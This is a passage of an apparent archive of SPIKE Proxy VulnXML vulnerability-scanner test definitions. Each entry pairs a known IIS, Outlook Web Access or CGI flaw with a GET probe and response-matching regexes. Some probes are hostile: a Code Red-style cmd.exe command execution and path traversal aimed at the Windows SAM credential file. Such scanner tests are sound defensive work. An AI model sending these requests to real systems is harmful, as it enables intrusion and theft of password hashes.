was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1347.xml0100664000076500007650000000714707566204543017654 0ustar davedave (cmd.exe?/c+dir+/OG) "This machine is infected with Code Red 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /c/winnt/system32/cmd.exe?/c+dir+/OG HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Directory of C 200 Directory of C 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1348.xml0100664000076500007650000000707607566204543017656 0ustar davedave (snorkerz.bat) "Arguments passed to DOS CGI without checking" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/snorkerz.bat HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1349.xml0100664000076500007650000000707607566204543017657 0ustar davedave (snorkerz.cmd) "Arguments passed to DOS CGI without checking" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/snorkerz.cmd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-134.xml0100664000076500007650000000735007566204543017561 0ustar davedave (..%252f..%252f..%252f..%252f..%252f../windows/repair/sam) "BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /..%252f..%252f..%252f..%252f..%252f../windows/repair/sam HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1350.xml0100664000076500007650000000714007566204543017637 0ustar davedave (uploader.exe) "This CGI allows attackers to upload files to the server and then execute them." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-win/uploader.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1351.xml0100664000076500007650000000706407566204543017645 0ustar davedave (/) "Site Server sample files. This might be interresting." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /clocktower/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1352.xml0100664000076500007650000000706307566204543017645 0ustar davedave (1) "The IIS system may be vulnerable to a DOS 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /contents/extensions/asp/1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1353.xml0100664000076500007650000000731707566204543017650 0ustar davedave (root.asp?acs=anon) "This allows anonymous access to portions of the OWA server. http://support.microsoft.com/support/exchange/content/whitepapers/owaguide.doc" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exchange/root.asp?acs=anon HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ /exchange/logonfrm\.asp 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} /exchange/logonfrm\.asp spkproxy/VulnXML/SiteTests/sitetest-1354.xml0100664000076500007650000000724007566204543017644 0ustar davedave (AMPROPS.INC) "Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exchange/lib/AMPROPS.INC HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Logon functions 200 Logon functions 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1355.xml0100664000076500007650000000722607566204543017651 0ustar davedave (ATTACH.INC) "Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exchange/lib/ATTACH.INC HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ File upload 200 File upload 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1356.xml0100664000076500007650000000724007566204543017646 0ustar davedave (DELETE.INC) "Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exchange/lib/DELETE.INC HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ deleting objects 200 deleting objects 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1357.xml0100664000076500007650000000725407566204543017654 0ustar davedave (GETREND.INC) "Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exchange/lib/GETREND.INC HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ GetRenderer functions 200 GetRenderer functions 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1358.xml0100664000076500007650000000725607566204543017657 0ustar davedave (GETWHEN.INC) "Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exchange/lib/GETWHEN.INC HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ functions to construct 200 functions to construct 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1359.xml0100664000076500007650000000725607566204543017660 0ustar davedave (JSATTACH.INC) "Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exchange/lib/JSATTACH.INC HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Attachment Javascript 200 Attachment Javascript 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-135.xml0100664000076500007650000000734407566204543017565 0ustar davedave (..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam) "BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1360.xml0100664000076500007650000000725007566204543017642 0ustar davedave (JSROOT.INC) "Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exchange/lib/JSROOT.INC HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Javascript Functions 200 Javascript Functions 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1361.xml0100664000076500007650000000724207566204543017644 0ustar davedave (JSUTIL.INC) "Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exchange/lib/JSUTIL.INC HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Common Javascript 200 Common Javascript 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1362.xml0100664000076500007650000000723607566204543017650 0ustar davedave (LANG.INC) "Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exchange/lib/LANG.INC HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ localized strings 200 localized strings 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1363.xml0100664000076500007650000000723407566204543017647 0ustar davedave (logon.inc) "Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exchange/lib/logon.inc HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Logon functions 200 Logon functions 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1364.xml0100664000076500007650000000725207566204543017650 0ustar davedave (PAGEUTIL.INC) "Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exchange/lib/PAGEUTIL.INC HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ functions that help 200 functions that help 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1365.xml0100664000076500007650000000724607566204543017654 0ustar davedave (PUBFLD.INC) "Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exchange/lib/PUBFLD.INC HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Anonymous Published 200 Anonymous Published 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1366.xml0100664000076500007650000000724607566204543017655 0ustar davedave (RENDER.INC) "Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exchange/lib/RENDER.INC HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Rendering functions 200 Rendering functions 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1367.xml0100664000076500007650000000724607566204543017656 0ustar davedave (SESSION.INC) "Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exchange/lib/SESSION.INC HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Session Management 200 Session Management 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1368.xml0100664000076500007650000000711307566204543017650 0ustar davedave (exair/howitworks/Code.asp) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/exair/howitworks/Code.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1369.xml0100664000076500007650000000716207566204543017655 0ustar davedave (exair/howitworks/Codebrw1.asp) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/exair/howitworks/Codebrw1.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-136.xml0100664000076500007650000000735007566204543017563 0ustar davedave (..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._) "BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1370.xml0100664000076500007650000000715207566204543017644 0ustar davedave (sdk/asp/docs/codebrw2.asp) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/sdk/asp/docs/codebrw2.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1371.xml0100664000076500007650000000715207566204543017645 0ustar davedave (sdk/asp/docs/codebrws.asp) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1372.xml0100664000076500007650000000721707566204543017650 0ustar davedave (codebrws.asp) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ ASP Source code browser 200 ASP Source code browser 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1373.xml0100664000076500007650000000707707566204543017655 0ustar davedave (advsearch.asp) "This can be used to DoS IIS" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/exair/search/advsearch.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1374.xml0100664000076500007650000000706707566204543017655 0ustar davedave (query.asp) "This can be used to DoS IIS" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/exair/search/query.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1375.xml0100664000076500007650000000731707566204543017654 0ustar davedave (query.idq) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/exair/search/query.idq HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ The template file can not be found in the location specified 200 The template file can not be found in the location specified 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1376.xml0100664000076500007650000000707107566204543017652 0ustar davedave (search.asp) "This can be used to DoS IIS" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/exair/search/search.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1377.xml0100664000076500007650000000732107566204543017651 0ustar davedave (search.idq) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/exair/search/search.idq HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ The template file can not be found in the location specified 200 The template file can not be found in the location specified 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1378.xml0100664000076500007650000000720607566204543017654 0ustar davedave (codebrws.asp) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/issamples/codebrws.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Sample ASP Search Form 200 Sample ASP Search Form 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1379.xml0100664000076500007650000000731407566204543017655 0ustar davedave (fastq.idq) "This is a default IIS script/file which should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iissamples/issamples/fastq.idq HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ The template file can not be found in the location specified 200 The template file can not be 